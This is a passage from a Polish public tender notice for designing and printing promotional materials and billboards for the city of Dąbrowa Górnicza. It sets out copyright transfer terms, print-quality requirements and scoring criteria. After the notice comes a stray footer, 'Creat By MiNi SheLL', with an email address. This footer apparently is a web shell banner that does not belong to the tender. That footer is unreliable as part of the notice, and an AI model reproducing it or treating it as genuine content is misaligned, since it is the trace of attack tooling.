12. W ramach wynagrodzenia Wykonawca przenosi na Zamawiającego na zasadzie wyłączności, autorskie prawa majątkowe: do projektów powstałych i utrwalonych w jakiejkolwiek formie w ramach realizacji niniejszej Umowy (m.in. zdjęć, rysunków, grafik); do nieograniczonego w czasie korzystania i rozporządzania projektami  na polach eksploatacji określonych w art. 50 ustawy z dnia 4 lutego1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. z 2006 r., Nr 90, poz. 631 z późn. zm.), w tym w szczególności na następujących polach eksploatacji:
a) utrwalanie i trwałe lub czasowe w całości lub części zwielokrotnianie w dowolnej ilości egzemplarzy i kopii projektów, dowolną techniką, w tym w szczególności techniką drukarską, reprograficzną, bądź analogową lub cyfrową przy zastosowaniu metody zapisu magnetycznego lub optycznego lub w jakiejkolwiek formie;
b) przeglądanie, dowolne modyfikowanie i wykorzystywanie projektów, w tym w szczególności:
- wprowadzanie do obrotu elektronicznego, w tym poprzez sieć Internet,
- umieszczanie w zasobach komputerów,
-  tłumaczenie, przystosowywanie, zmiany układu lub jakiekolwiek inne zmiany w projekcie,
- rozpowszechnianie, w tym użyczanie lub najem projektów lub ich kopii,
-  wykorzystywanie podczas pokazów publicznych,
-  wykorzystywanie projektów do prezentacji,
-  przesyłanie przy wykorzystaniu środków przekazu obrazu lub dźwięku,
c) prezentowanie, wyświetlanie, ukazywanie oraz wprowadzanie do pamięci komputera;
d) wielokrotne udostępnianie i przekazywanie projektów osobom trzecim z prawem do jego korzystania;
e) tworzenie utworów zależnych i pochodnych,
13. Autorskie prawa majątkowe, o których mowa w pkt. 12 przechodzą na Zamawiającego  z chwilą podpisania  przez strony  protokołu zdawczo - odbiorczego z należytego wykonania poszczególnych części przedmiotu zamówienia.
14. Wykonawca  jest zobowiązany do przekazania Zamawiającemu zaakceptowanych przez niego projektów materiałów  na nośniku w formie płyty CD w wersji edytowalnej.  Przedmiotowy nośnik wraz z projektami powinien być dostarczony z każdą dostawą wydrukowanych materiałów.
15. Gdyby z przyczyn niezależnych od Zamawiającego obniżyła się wysokość środków przewidzianych przez Zamawiającego na realizację poszczególnych zadań lub wystąpiła inna ważna przyczyna uzasadniająca zmniejszenie  ilości szacowanych nakładów, nie może to stanowić podstawy do rozwiązania umowy przez Wykonawcę z winy Zamawiającego, ani do żądania kary umownej czy odszkodowania.  
16. Wymagania techniczne i jakościowe dotyczące wykonania materiałów promocyjno - informacyjnych:
1. Zadruk powierzchni:
a) odpowiedni stopień nasycenia barw tzn. odpowiadający barwom w zaakceptowanym projekcie , teksty o odpowiednim stopniu zaczernienia. Zamawiający nie dopuszcza druku tekstów w kolorach szarości.
b) zachowanie czystości druku
c) zachowanie czytelności 
d) zachowanie ostrości konturów
e) zachowanie pasowania barw elementów graficznych
2. Wykończenie powierzchni:
a) równomierne pokrycie powierzchni
b) brak występowania nierówności
c) brak obdarć
d) brak zacieków
e) brak zmarszczeń
f) brak zabrudzeń
3. Inne:
a) prawidłowy format wydruku (zgodny ze zleconym)
b) prawidłowe zachowanie marginesów (zgodne z projektem)
c) równomierna intensywność druku
d) zachowanie odpowiednich kątów po obcięciu
e) brak występowania zjawiska odkształcenia
f) brak wstępowania zjawiska marszczenia się zadrukowanych powierzchni
17. Rozwiązania równoważne
Wskazane w SIWZ znaki towarowe, patenty i miejsce pochodzenia są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia w tej części w sposób jednoznaczny i wyczerpujący. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 ustawą. W związku z tym :
Zamawiający dopuszcza zastosowanie rozwiązań równoważnych - tj. o parametrach jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do rozwiązań, których pochodzenie zostało określone przez Zamawiającego w SIWZ nazwą producenta.
 Zgodnie z art. 30 ust. 5 ustawy Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego. Równoważność pod względem parametrów jakościowych ma w szczególności gwarantować realizację usługi  zgodnie z wymaganiami określonymi w SIWZ.
18. Zamawiający informuje, że poz. 69 Projekt i druk ulotki promującej seminarium lokalne organizowane w ramach projektu: RE-GREEN w pkt. 3.3.1. SIWZ jest współfinansowana ze środków Unii Europejskiej w ramach Programu Operacyjnego Współpracy Międzyregionalnej INTERREG IVC - akronim: RE-GREEN REgional policies towards GREEN buildings.

II. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 

III. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie  z zapisami zawartymi w pkt 9 SIWZ.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt 9.1.1. SIWZ, dokumenty wymienione w pkt. 9.1.2. i 9.1.3. i 9.1.4. SIWZ, Formularz ofertowy wymieniony w pkt 9.5.1. SIWZ składają wszyscy Wykonawcy wspólnie na jednym druku lub pełnomocnik w imieniu wszystkich Wykonawców. Próbki wymienione w pkt. 9.4. SIWZ Wykonawcy składają wspólnie. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 

IV. Uszczegółowienie sekcji II.2., Załącznika I Część nr 1 pkt 3; Część nr 2 pkt 3: Rozpoczęcie realizacji zamówienia: od dnia podpisania umowy; Zakończenie realizacji zamówienia: 31.12.2014 r. lub do wyczerpania środków budżetowych zabezpieczonych na ten cel.

V. Uszczegółowienie kryteriów oceny ofert z podziałem na części zamówienia:
Zadanie I:
1. Cena-50 %, Walory estetyczne-50%. 
2. W przypadku kryterium walory estetyczne: na podstawie przedłożonych wraz z ofertą po 1 egzemplarzu poszczególnych rodzajów próbek zgodnie z pkt. 9.4.1. SIWZ, tj.:
Plakat, Ulotka, Zaproszenie, Kartka świąteczna.
3. Komisja przetargowa oceni przedłożone wraz z ofertą próbki biorąc pod uwagę następujące kategorie:
3.1. atrakcyjność i oryginalność - w tej kategorii będą brane pod uwagę takie elementy jak: zdolność do  wywołania zainteresowania, wyjątkowość, swoistość, niepowtarzalność, innowacyjność, pomysłowość;
3.2. czystość barw - w tej kategorii w ocenie próbek będą brane pod uwagę takie elementy jak: użyta gama barw, kontrast miedzy zastosowanymi barwami, zawartość szarości w zastosowanych barwach;
3.3. jakość wykonania poligraficznego - w tej kategorii będą oceniane próbki pod względem solidności wykonania, a także wytrzymałość próbek
3.4. ogólna estetyka - w tej kategorii będą oceniane próbki pod względem współgrania wszystkich elementów, które  je tworzą
3.5. wyrazistość przekazu - w tej kategorii będą oceniane próbki pod względem ich dostosowania do określonego charakteru i tematyki, będzie oceniana czytelność, zrozumiałość przekazu.
4. W każdej kategorii Komisja będzie przyznawać każdemu rodzajowi próbki tzw. małe punkty w skali od 1 pkt  do 3 pkt (przy założeniu, że 1 pkt mały oznacza niski poziom próbki w ramach kategorii, 2 pkt małe oznaczają średni poziom próbki w ramach kategorii, 3 pkt małe oznaczają wysoki poziom próbki w ramach kategorii). Uzyskane małe punkty będą sumowane, a uzyskana suma będzie stanowiła ilość małych punktów jaką otrzyma badana oferta za kryterium walory estetyczne. Oferta będzie mogła uzyskać maks. 60 małych punktów w ramach tego kryterium.
Zadanie II 
1. Cena - 70 %,  Walory estetyczne-30%.
2. Sposób punktacji w ramach kryterium walory estetyczne: na podstawie przedłożonych wraz z ofertą 1 egzemplarz próbki materiału reklamowego na billboard, zgodnie z pkt 9.4.2. SIWZ. 
3. Komisja przetargowa oceni przedłożoną wraz z ofertą próbkę biorąc pod uwagę następujące kategorie:
3.1. atrakcyjność i  oryginalność projektu - w tej kategorii będą brane pod uwagę takie elementy jak: zdolność do  wywołania zainteresowania, wyjątkowość, swoistość, niepowtarzalność, innowacyjność, pomysłowość;
3.2. ogólna estetyka - w tej kategorii będą oceniane próbki pod względem współgrania wszystkich elementów, które  je tworzą;
3.3. wyrazistość przekazu - w tej kategorii będą oceniane próbki pod względem ich dostosowania do określonego charakteru i tematyki, będzie oceniana czytelność, zrozumiałość przekazu.
4. W każdej kategorii Komisja będzie przyznawać każdemu rodzajowi próbki tzw. małe punkty w skali od 1 pkt  do 3 pkt (przy założeniu, że 1 pkt mały oznacza niski poziom próbki w ramach kategorii, 2 pkt małe oznaczają średni poziom próbki w ramach kategorii, 3 pkt małe oznaczają wysoki poziom próbki w ramach kategorii). Uzyskane małe punkty będą sumowane, a uzyskana suma będzie stanowiła ilość małych punktów jaką otrzyma badana oferta za kryterium walory estetyczne. Oferta będzie mogła uzyskać maks. 9 małych punktów w ramach tego kryterium.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza
zadanie I. Wykonanie materiałów promocyjno-informacyjnych miasta Dąbrowa Górnicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie I. Wykonanie materiałów promocyjno-informacyjnych miasta Dąbrowa Górnicza. Przedmiot i zakres zamówienia znajduje się w sekcji II.1.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Walory estetyczne - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Projekt i druk materiałów promocyjno -  informacyjnych miasta Dąbrowa Górnicza 
zadanie II. Wykonanie materiałów reklamowych na billboardy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie II. Wykonanie materiałów reklamowych na billboardy. Przedmiot i zakres zamówienia znajduje się w sekcji II.1.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Walory estetyczne - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com